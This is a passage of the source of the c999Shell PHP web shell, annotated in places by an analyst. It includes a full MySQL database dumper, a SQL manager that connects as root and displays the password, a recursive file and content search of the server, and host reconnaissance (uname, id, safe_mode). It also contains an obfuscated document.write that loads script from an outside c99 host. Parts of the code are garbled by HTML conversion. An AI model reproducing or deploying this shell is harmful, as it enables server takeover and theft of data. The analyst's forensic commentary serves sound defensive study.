 550  $onlytabs = $set["onlytabs"]; // optional filter on that list
 551  $ret = array();
 552  $ret["err"] = array(); // errors are collected here, but $ret is never returned
 553  if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} // only reports the problem; execution continues
 554  if (empty($db)) {$db = "db";}
 555  if (empty($print)) {$print = 0;}
 556  if (empty($nl2br)) {$nl2br = 0;}
 557  if (empty($add_drop)) {$add_drop = TRUE;} // an empty/false value is replaced with TRUE, so DROP statements are always emitted
 558  if (empty($file))
 559  {
 560   $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; // default name dump_<server name>_<db>_<dd-mm-YYYY-HH-MM-SS>.sql; $tmpdir is not declared global in this function, so the prefix is empty and the file lands in the current working directory. Files matching this pattern on a web host are a forensic indicator of database export
 561  }
 562  if (!is_array($tabs)) {$tabs = array();}
 563  if (empty($add_drop)) {$add_drop = TRUE;} // repeats the default applied above
 564  if (sizeof($tabs) == 0)
 565  {
 566   // retrieve the table list when the caller gave none
 567   $res = mysql_query("SHOW TABLES FROM ".$db, $sock); // database name is concatenated unquoted
 568   if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
 569  }
 570  $out = "# Dumped by c999Shell.SQL v. ".$shver."
 571 # Home page: http://ccteam.ru
 572 #
 573 # Host settings:
 574 # MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
 575 # Date: ".date("d.m.Y H:i:s")."
 576 # DB: \"".$db."\"
 577 #---------------------------------------------------------
 578 "; // dump header; the "# Dumped by c999Shell.SQL" first line is a content signature for finding exported dumps on disk
 579  $c = count($onlytabs);
 580  foreach($tabs as $tab)
 581  {
 582   if ((in_array($tab,$onlytabs)) or (!$c)) // dump the table if it is in the filter, or if no filter was given
 583   {
 584    if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
 585    // fetch the CREATE TABLE statement for the table structure
 586    $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
 587    if (!$res) {$ret["err"][] = mysql_smarterror();} // called without arguments although mysql_smarterror() is declared with two parameters
 588    else
 589    {
 590     $row = mysql_fetch_row($res);
 591     $out .= $row["1"].";\n\n"; // column 1 of SHOW CREATE TABLE holds the statement text
 592     // fetch the table rows
 593     $res = mysql_query("SELECT * FROM `$tab`", $sock); // full table read
 594     if (mysql_num_rows($res) > 0)
 595     {
 596      while ($row = mysql_fetch_assoc($res))
 597      {
 598       $keys = implode("`, `", array_keys($row));
 599       $values = array_values($row);
 600       foreach($values as $k=>$v) {$values[$k] = addslashes($v);} // values are escaped with addslashes() only
 601       $values = implode("', '", $values);
 602       $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; // one INSERT per row, every value written as a quoted string
 603       $out .= $sql;
 604      }
 605     }
 606    }
 607   }
 608  }
 609  $out .= "#---------------------------------------------------------------------------------\n\n";
 610  if ($file)
 611  {
 612   $fp = fopen($file, "w"); // the whole dump is written to disk in one go
 613   if (!$fp) {$ret["err"][] = 2;}
 614   else
 615   {
 616    fwrite ($fp, $out);
 617    fclose ($fp);
 618   }
 619  }
 620  if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
 621  return $out; // the dump text itself is the return value
 622 }
 623 }
 624 if (!function_exists("mysql_buildwhere"))
 625 {
 626 function mysql_buildwhere($array,$sep=" and",$functs=array())
 627 {
 628  if (!is_array($array)) {$array = array();}
 629  $result = "";
 630  foreach($array as $k=>$v)
 631  {
 632   $value = "";
 633   if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
 634   $value .= "'".addslashes($v)."'";
 635   if (!empty($functs[$k])) {$value .= ")";}
 636   $result .= "`".$k."` = ".$value.$sep;
 637  }
 638  $result = substr($result,0,strlen($result)-strlen($sep));
 639  return $result;
 640 }
 641 }
 642 if (!function_exists("mysql_fetch_all"))
 643 {
 644 function mysql_fetch_all($query,$sock)
 645 {
 646  if ($sock) {$result = mysql_query($query,$sock);}
 647  else {$result = mysql_query($query);}
 648  $array = array();
 649  while ($row = mysql_fetch_array($result)) {$array[] = $row;}
 650  mysql_free_result($result);
 651  return $array;
 652 }
 653 }
 654 if (!function_exists("mysql_smarterror"))
 655 {
 656 function mysql_smarterror($type,$sock)
 657 {
 658  if ($sock) {$error = mysql_error($sock);}
 659  else {$error = mysql_error();}
 660  $error = htmlspecialchars($error);
 661  return $error;
 662 }
 663 }
 664 if (!function_exists("mysql_query_form"))
 665 {
 666 function mysql_query_form()
 667 {
 668  global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
 669  if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b>
 670 ".$sql_query_error."
 671 ";}
 672  if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
 673  if ((!$submit) or ($sql_act))
 674  {
 675   echo "</pre>
 676 "; if ($tbl_struct) { echo "
 677 <table border="0">
 678 <tbody>
 679 <tr>
 680 <td><form method="POST" name="\&quot;c999sh_sqlquery\&quot;"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b>
 681 
 682 <textarea cols="100" name="sql_query" rows="10">".htmlspecialchars($sql_query)."</textarea>
 683 
 684 <input type="hidden" name="act" value="sql" /><input type="hidden" name="sql_act" value="query" /><input type="hidden" name="sql_tbl" value="\&quot;&quot;.htmlspecialchars($sql_tbl).&quot;\&quot;" /><input type="hidden" name="submit" value="\&quot;1\&quot;" /><input type="hidden" name="\&quot;sql_goto\&quot;" value="\&quot;&quot;.htmlspecialchars($sql_goto).&quot;\&quot;" /><input type="submit" name="sql_confirm" value="\&quot;Yes\&quot;" /> <input type="submit" value="\&quot;No\&quot;" /></form></td>
 685 <td valign="\&quot;top\&quot;"><b>Fields:</b>
 686 ";
 687  foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "� <a onclick="\&quot;document.c999sh_sqlquery.sql_query.value+='`&quot;.$name.&quot;`';\&quot;" href="\&quot;#\&quot;"><b>".$name."</b></a>
 688 ";}
 689  echo "</td>
 690 </tr>
 691 </tbody>
 692 </table>
 693 <pre>
 694 ";
 695  }
 696  }
 697  if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
 698 }
 699 }
 700 if (!function_exists("mysql_create_db"))
 701 {
 702 function mysql_create_db($db,$sock="")
 703 {
 704  $sql = "CREATE DATABASE `".addslashes($db)."`;";
 705  if ($sock) {return mysql_query($sql,$sock);}
 706  else {return mysql_query($sql);}
 707 }
 708 }
 // Declared only when no function named mysql_query_parse() exists yet.
 709 if (!function_exists("mysql_query_parse"))
 710 {
 // Classifies a SQL statement by its first whitespace-separated word so the
 // caller can decide how much output to render for it.
 //   $query - raw SQL text; it is trimmed and split on single spaces.
 // Returns FALSE when the first word is not a key of $types.
 // NOTE(analysis): for a recognised keyword the function builds $result but has
 // no return statement on that path, so the caller receives NULL.
 711 function mysql_query_parse($query)
 712 {
 713  $query = trim($query);
 714  $arr = explode (" ",$query);
 715  /*array array()
 716  {
 717  "METHOD"=>array(output_type),
 718  "METHOD1"...
 719  ...
 720  }
 721  if output_type == 0, no output,
 722  if output_type == 1, no output if no error
 723  if output_type == 2, output without control-buttons
 724  if output_type == 3, output with control-buttons
 725  */
 // Lookup table: statement keyword => list of output_type codes (see above).
 726  $types = array(
 727  "SELECT"=>array(3,1),
 728  "SHOW"=>array(2,1),
 729  "DELETE"=>array(1),
 730  "DROP"=>array(1)
 731  );
 732  $result = array();
 // Keyword match is case-insensitive because the first word is upper-cased.
 733  $op = strtoupper($arr[0]);
 734  if (is_array($types[$op]))
 735  {
 // The key name "propertions" is the original spelling; it is a runtime string.
 736  $result["propertions"] = $types[$op];
 737  $result["query"] = $query;
 // NOTE(analysis): $types[$op] is an array here, and this compares it with the
 // integer 2; that comparison does not appear able to succeed, so the LIMIT
 // extraction below looks unreachable.
 738  if ($types[$op] == 2)
 739  {
 740  foreach($arr as $k=>$v)
 741  {
 742  if (strtoupper($v) == "LIMIT")
 743  {
 // Takes the word after LIMIT, splits "offset,count" on the comma, and turns a
 // single number into array(0, number).
 744  $result["limit"] = $arr[$k+1];
 745  $result["limit"] = explode(",",$result["limit"]);
 746  if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
 // Removes the LIMIT word and its argument from the local word list only;
 // $result["query"] was stored earlier and is not rewritten.
 747  unset($arr[$k],$arr[$k+1]);
 748  }
 749  }
 750  }
 751  }
 752  else {return FALSE;}
 753 }
 754 }
 // Declared only when no function named c999fsearch() exists yet.
 755 if (!function_exists("c999fsearch"))
 756 {
 // Recursive server-side file search by name and, optionally, by file content.
 //   $d - directory to start from; a trailing separator is appended if missing.
 // Results and criteria are exchanged through globals rather than parameters:
 //   $found                    - list of matching paths (appended to)
 //   $found_d / $found_f       - counts of matching directories / files
 //   $search_i_d / $search_i_f - counts of directories / files visited
 //   $a                        - criteria: "name", "name_regexp", "text",
 //                               "text_wwo", "text_cs", "text_regexp", "text_not"
 // Relevant for incident scoping: the routine walks and reads whatever the PHP
 // process is able to read below $d.
 // NOTE(analysis): ereg() was removed in PHP 7.0, so the regexp modes only work
 // on older runtimes.
 757 function c999fsearch($d)
 758 {
 759  global $found;
 760  global $found_d;
 761  global $found_f;
 762  global $search_i_f;
 763  global $search_i_d;
 764  global $a;
 765  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
 // NOTE(analysis): the opendir() result is used without a failure check.
 766  $h = opendir($d);
 767  while (($f = readdir($h)) !== FALSE)
 768  {
 769  if($f != "." && $f != "..")
 770  {
 // Name test: substring match by default, ereg() when "name_regexp" is set.
 771  $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
 772  if (is_dir($d.$f))
 773  {
 774  $search_i_d++;
 // A directory is reported only for name-only searches (no "text" criterion).
 775  if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
 // Symbolic links are not followed when descending.
 776  if (!is_link($d.$f)) {c999fsearch($d.$f);}
 777  }
 778  else
 779  {
 780  $search_i_f++;
 781  if ($bool)
 782  {
 783  if (!empty($a["text"]))
 784  {
 // The whole file is loaded into memory; "@" hides read errors.
 785  $r = @file_get_contents($d.$f);
 // These two lines rewrite $a["text"] in the global criteria array, so the
 // padded / lower-cased form persists for later files and recursive calls.
 786  if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
 787  if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
 788  if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
 // A space is prepended and the search starts at offset 1, so a hit at the very
 // start of the file yields position 1 (truthy) instead of 0.
 789  else {$bool = strpos(" ".$r,$a["text"],1);}
 // "text_not" inverts the content test.
 790  if ($a["text_not"]) {$bool = !$bool;}
 791  if ($bool) {$found[] = $d.$f; $found_f++;}
 792  }
 793  else {$found[] = $d.$f; $found_f++;}
 794  }
 795  }
 796  }
 797  }
 798  closedir($h);
 799 }
 800 }
 // Resolves the "gofile" action into a directory listing ("ls", with $d set to
 // the path) or a single-file view ("f", with $d / $f split into directory and
 // base name).
 // NOTE(analysis): $act and $f are not assigned in this part of the listing;
 // presumably they come from the loop at the top of the file that copies request
 // parameters into same-named variables - confirm against the full sample.
 801 if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
 802 //Sending headers
 // Output buffering is started here; onphpshutdown() reads this buffer back when
 // it re-emits the page through ob_gzHandler.
 803 @ob_start();
 804 @ob_implicit_flush(0);
 // Re-sends the buffered page through the gzip output handler.
 // Reads globals $gzipencode (enable flag) and $ft (current view type).
 // Does nothing when headers were already sent, when $gzipencode is falsy, or
 // when $ft is "img", "download" or "notepad".
 805 function onphpshutdown()
 806 {
 807  global $gzipencode,$ft;
 808  if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))
 809  {
 // Capture the current buffer, discard it, then start a new buffer whose
 // callback is ob_gzHandler and replay the captured output into it.
 810  $v = @ob_get_contents();
 811  @ob_end_clean();
 812  @ob_start("ob_gzHandler");
 813  echo $v;
 814  @ob_end_flush();
 815  }
 816 }
 // Terminates the script after giving onphpshutdown() the chance to flush the
 // buffered output (gzip-encoded when enabled).
 817 function c999shexit()
 818 {
 819  onphpshutdown();
 820  exit;
 821 }
 // Anti-caching response headers: an Expires date in the past, Last-Modified set
 // to the current time, and no-store / no-cache directives. The second
 // Cache-Control header is sent with replace=FALSE so that it is added to the
 // first instead of overwriting it.
 822 header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
 823 header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
 824 header("Cache-Control: no-store, no-cache, must-revalidate");
 825 header("Cache-Control: post-check=0, pre-check=0", FALSE);
 826 header("Pragma: no-cache");
 // Working directory for temporary files: defaults to PHP's upload_tmp_dir.
 827 if (empty($tmpdir))
 828 {
 829  $tmpdir = ini_get("upload_tmp_dir");
 // NOTE(analysis): the value is replaced by "/tmp/" when it IS a directory;
 // the condition looks inverted (a missing "!"), but that is what the listing
 // shows.
 830  if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
 831 }
 // Canonicalise the path, normalise backslashes to the platform separator and
 // make sure it ends with a separator.
 832 $tmpdir = realpath($tmpdir);
 833 $tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
 834 if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
 // The log directory falls back to the temporary directory when not set.
 835 if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
 836 else {$tmpdir_logs = realpath($tmpdir_logs);}
 // Reads two PHP hardening settings and prepares the HTML labels shown in the
 // page header: $safemode / $hsafemode for safe_mode, $openbasedir /
 // $hopenbasedir for open_basedir. A restrictive setting is rendered in red, an
 // absent one in green as "OFF (not secure)".
 // NOTE(analysis): safe_mode was removed in PHP 5.4, so on later runtimes this
 // check reports OFF.
 837 if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
 838 {
 839  $safemode = TRUE;
 840  $hsafemode = "</pre>
 841 <span style="color: red;">ON (secure)</span>
 842 <pre>";
 843 }
 844 else {$safemode = FALSE; $hsafemode = "</pre>
 845 <span style="color: green;">OFF (not secure)</span>
 846 <pre>";}
 // For open_basedir the configured value itself is placed in the label, without
 // HTML escaping.
 847 $v = @ini_get("open_basedir");
 848 if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "</pre>
 849 <span style="color: red;">".$v."</span>
 850 <pre>";}
 851 else {$openbasedir = FALSE; $hopenbasedir = "</pre>
 852 <span style="color: green;">OFF (not secure)</span>
 853 <pre>";}
 // Prepares display variables for the page header.
 // $sort is HTML-escaped, replaced by $sort_default when empty, and its second
 // element / character is lower-cased.
 854 $sort = htmlspecialchars($sort);
 855 if (empty($sort)) {$sort = $sort_default;}
 856 $sort[1] = strtolower($sort[1]);
 // Server banner: the SERVER_SOFTWARE value, with "PHP/<version>" appended when
 // missing, then HTML-escaped and the PHP token turned into a link to the
 // act=phpinfo view.
 // NOTE(analysis): ereg() was removed in PHP 7.0.
 857 $DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
 858 if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
 859 $DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href="\&quot;&quot;.$surl.&quot;act=phpinfo\&quot;" target="\&quot;_blank\&quot;"><b><span style="text-decoration: underline;">PHP/".phpversion()."</span></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
 // Syntax-highlighting colours are pushed into the PHP configuration at run
 // time; "@" hides failures. The trailing comments list the author's values.
 860 @ini_set("highlight.bg",$highlight_bg); //FFFFFF
 861 @ini_set("highlight.comment",$highlight_comment); //#FF8000
 862 @ini_set("highlight.default",$highlight_default); //#0000BB
 863 @ini_set("highlight.html",$highlight_html); //#000000
 864 @ini_set("highlight.keyword",$highlight_keyword); //#007700
 865 @ini_set("highlight.string",$highlight_string); //#DD0000
 866 if (!is_array($actbox)) {$actbox = array();}
 // The action name is HTML-escaped once and kept in both $act (used for
 // dispatch) and $dspact (used for display).
 867 $dspact = $act = htmlspecialchars($act);
 868 $disp_fullpath = $ls_arr = $notls = null;
 // URL-encoded copy of the current directory.
 869 $ud = urlencode($d);
 870 ?><meta http-equiv="Content-Type" content="text/html; charset=windows-1251" /><meta http-equiv="Content-Language" content="en-us" /><?php echo getenv("HTTP_HOST"); ?> - phpshell</pre>
 871 <style><!--
 872 TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ 
font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}
 873 --></style>
 874 <pre></pre>
 875 <center>
 876 <table style="border-collapse: collapse;" width="100%" border="1" cellspacing="0" cellpadding="5" bgcolor="#333333">
 877 <tbody>
 878 <tr>
 879 <th colspan="2" valign="top" nowrap="nowrap" width="101%" height="15">
 880 <span style="font-family: Webdings; font-size: xx-large;"><b>!</b></span><a href="<?php echo $surl; ?>"><span style="font-family: Verdana; font-size: x-large;"><b><script type="text/javascript">// <![CDATA[
 // NOTE(analysis): the \u-escaped string passed to document.write() decodes to a
 // SCRIPT element whose SRC is hxxp://www.c99[.]mobi/images/img.js (defanged
 // here). Every render of this page therefore makes the viewer's browser fetch
 // and run script from that third-party host. The request presumably discloses
 // the page's URL to that host (for example through the Referer header), which
 // makes the hostname a useful indicator when reviewing proxy or DNS logs.
 881 document.write('\u003c\u0053\u0043\u0052\u0049\u0050\u0054\u0020\u0053\u0052\u0043\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u0063\u0039\u0039\u002e\u006d\u006f\u0062\u0069\u002f\u0069\u006d\u0061\u0067\u0065\u0073\u002f\u0069\u006d\u0067\u002e\u006a\u0073\u003e\u003c\u002f\u0053\u0043\u0052\u0049\u0050\u0054\u003e')
 882 // ]]></script>c999Shell v. <!--?php echo $shver; ?--></b></span></a><span style="font-family: Webdings; font-size: xx-large;"><b>!</b></span></th>
 883 </tr>
 884 </tbody>
 885 </table>
 886 </center>
 887 <pre>
 888 <b>Software: <!--?php echo $DISP_SERVER_SOFTWARE; ?--></b> 
 889 
 890 <b>uname -a: <!--?php echo wordwrap(php_uname(),90,"<br ?-->",1); ?></b> 
 891 
 892 <b><!--?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br ?-->",1);} else {echo get_current_user();} ?></b> 
 893 
 894 <b>Safe-mode: <!--?php echo $hsafemode; ?--></b>
 895 
 896 <!--?php <br ?-->$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
 897 if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
 898 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
 899 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
 900 $d = str_replace("\\\\","\\",$d);
 901 $dispd = htmlspecialchars($d);
 902 $pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
 903 $i = 0;
 904 foreach($pd as $b)
 905 {
 906  $t = "";
 907  $j = 0;
 908  foreach ($e as $r)
 909  {
 910  $t.= $r.DIRECTORY_SEPARATOR;
 911  if ($j == $i) {break;}
 912  $j++;
 913  }
 914  echo "<a href="\&quot;&quot;.$surl.&quot;act=ls&d=&quot;.urlencode($t).&quot;&sort=&quot;.$sort.&quot;\&quot;"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
 915  $i++;
 916 }
 917 echo "   ";
 918 if (is_writable($d))
 919 {
 920  $wd = TRUE;
 921  $wdt = "<span style="color: green;">[ ok ]</span>";
 922  echo "<b><span style="color: green;">".view_perms(fileperms($d))."</span></b>";
 923 }
 924 else
 925 {
 926  $wd = FALSE;
 927  $wdt = "<span style="color: red;">[ Read-Only ]</span>";
 928  echo "<b>".view_perms_color($d)."</b>";
 929 }
 930 if (is_callable("disk_free_space"))
 931 {
 932  $free = disk_free_space($d);
 933  $total = disk_total_space($d);
 934  if ($free === FALSE) {$free = 0;}
 935  if ($total === FALSE) {$total = 0;}
 936  if ($free < 0) {$free = 0;}
 937  if ($total < 0) {$total = 0;}
 938  $used = $total-$free;
 939  $free_percent = round(100/($total/$free),2);
 940  echo "
 941 <b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>";
 942 }
 943 echo "
 944 ";
 945 $letters = "";
 946 if ($win)
 947 {
 948  $v = explode("\\",$d);
 949  $v = $v[0];
 950  foreach (range("a","z") as $letter)
 951  {
 952  $bool = $isdiskette = in_array($letter,$safemode_diskettes);
 953  if (!$bool) {$bool = is_dir($letter.":\\");}
 954  if ($bool)
 955  {
 956  $letters .= "<a onclick="\&quot;return" href="\&quot;&quot;.$surl.&quot;act=ls&d=&quot;.urlencode($letter.&quot;:\\&quot;).&quot;\&quot;&quot;.($isdiskette?&quot;">[ ";
 957  if ($letter.":" != $v) {$letters .= $letter;}
 958  else {$letters .= "<span style="color: green;">".$letter."</span>";}
 959  $letters .= " ]</a> ";
 960  }
 961  }
 962  if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."
 963 ";}
 964 }
 965 if (count($quicklaunch) > 0)
 966 {
 967  foreach($quicklaunch as $item)
 968  {
 969  $item[1] = str_replace("%d",urlencode($d),$item[1]);
 970  $item[1] = str_replace("%sort",$sort,$item[1]);
 971  $v = realpath($d."..");
 972  if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
 973  $item[1] = str_replace("%upd",urlencode($v),$item[1]);
 974  echo "<a href="\&quot;&quot;.$item[1].&quot;\&quot;">".$item[0]."</a>    ";
 975  }
 976 }
 977 echo "
 978 
 979 
 980 ";
 981 if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "</pre>
 982 <table width="\&quot;100%\&quot;" border="1" cellspacing="0" cellpadding="5" bgcolor="#333333">
 983 <tbody>
 984 <tr>
 985 <td valign="\&quot;top\&quot;" width="\&quot;100%\&quot;">".$donated_html."</td>
 986 </tr>
 987 </tbody>
 988 </table>
 989 <pre>
 990 
 991 ";}
 992 echo "</pre>
 993 <table width="\&quot;100%\&quot;" border="1" cellspacing="0" cellpadding="5" bgcolor="#333333">
 994 <tbody>
 995 <tr>
 996 <td valign="\&quot;top\&quot;" width="\&quot;100%\&quot;">";
 997 if ($act == "") {$act = $dspact = "ls";}
 998 if ($act == "sql")
 999 {
1000  $sql_surl = $surl."act=sql";
1001  if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
1002  if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
1003  if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
1004  if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
1005  if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
1006  $sql_surl .= "&";
1007  ?>
1008 <h3>Attention! SQL-Manager is <span style="text-decoration: underline;">NOT</span> ready module! Don't reports bugs.</h3>
1009 "; if (!$sql_sock) {?>
1010 <table style="border-collapse: collapse;" width="100%" border="1" cellspacing="0" cellpadding="5" bgcolor="#333333">
1011 <tbody>
1012 <tr>
1013 <td colspan="2" valign="top" width="100%" height="1"><center><!--?php <br ?--> if ($sql_server)
1014  {
1015  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
1016  $err = mysql_smarterror();
1017  @mysql_select_db($sql_db,$sql_sock);
1018  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
1019  }
1020  else {$sql_sock = FALSE;}
1021  echo "<b>SQL Manager:</b>
1022 ";
1023  if (!$sql_sock)
1024  {
1025  if (!$sql_server) {echo "NO CONNECTION";}
1026  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
1027  }
1028  else
1029  {
1030  $sqlquicklaunch = array();
1031  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
1032  $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
1033  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
1034  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
1035  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
1036  $sqlquicklaunch[] = array("Logout",$surl."act=sql");
1037  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b>
1038 ";
1039  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href="\&quot;&quot;.$item[1].&quot;\&quot;"><b>".$item[0]."</b></a> ] ";}}
1040  echo "</center>";
1041  }
1042  echo "</center></td>
1043 </tr>
1044 <tr>
1045 <td valign="top" width="28%" height="100"><center><span style="font-size: x-large;"> i </span></center>
1046 <ul>
1047    <li>If login is null, login is owner of process.</li>
1048    <li>If host is null, host is localhost</li>
1049    <li>If port is null, port is 3306 (default)</li>
1050 </ul>
1051 </td>
1052 <td valign="top" width="90%" height="1">
1053 <table width="100%" border="0" cellspacing="0" cellpadding="0">
1054 <tbody>
1055 <tr>
1056 <td> <b>Please, fill the form:</b>
1057 <table>
1058 <tbody>
1059 <tr>
1060 <td><b>Username</b></td>
1061 <td><b>Password</b></td>
1062 <td><b>Database</b></td>
1063 </tr>
1064 <tr>
1065 <td><input type="text" maxlength="64" name="sql_login" value="root" /></td>
1066 <td><input type="password" maxlength="64" name="sql_passwd" value="" /></td>
1067 <td><input type="text" maxlength="64" name="sql_db" value="" /></td>
1068 <td><b>Host</b></td>
1069 <td><b>PORT</b></td>
1070 <td align="right"><input type="text" maxlength="64" name="sql_server" value="localhost" /></td>
1071 <td><input type="text" maxlength="6" name="sql_port" size="3" value="3306" /></td>
1072 <td><input type="submit" value="Connect" /></td>
1073 <td></td>
1074 </tr>
1075 </tbody>
1076 </table>
1077 </td>
1078 <!--?php }  else  {   //Start left panel   if (!empty($sql_db))   {    ?-->
